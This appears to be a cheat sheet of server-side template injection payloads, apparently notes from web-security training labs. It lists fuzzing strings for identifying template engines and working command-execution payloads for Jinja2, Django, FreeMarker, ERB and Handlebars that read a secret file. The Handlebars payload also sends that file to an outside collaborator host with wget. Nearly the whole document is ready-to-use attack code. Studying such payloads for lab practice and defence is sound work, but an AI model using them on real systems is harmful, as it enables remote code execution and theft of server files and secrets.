Use the web framework native template syntax to inject a malicious payload into a {{input}} , which is then executed server-side. Submitting invalid syntax will often result in error message that lead to identifying template decision tree to aid in identification
Copy #those will throw an error
${{<%[%'"}}%\.
${{<%[%'"}}%\.,
}}{{7*7}}
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}
Copy }}{{ 7*7}}
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')
Copy ${{<%[%'"}}%\,
{% debug %}
{{settings.SECRET_KEY}}
Copy ${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }
Copy fuzzer${{<%[%'"}}%\<>
<%= 7*7 %>
<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>
<%= system("cat /home/carlos/secret") %>
Copy fuzzer${{<%[%'"}}%\,<>
#script to get file end send to collaborator
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}} 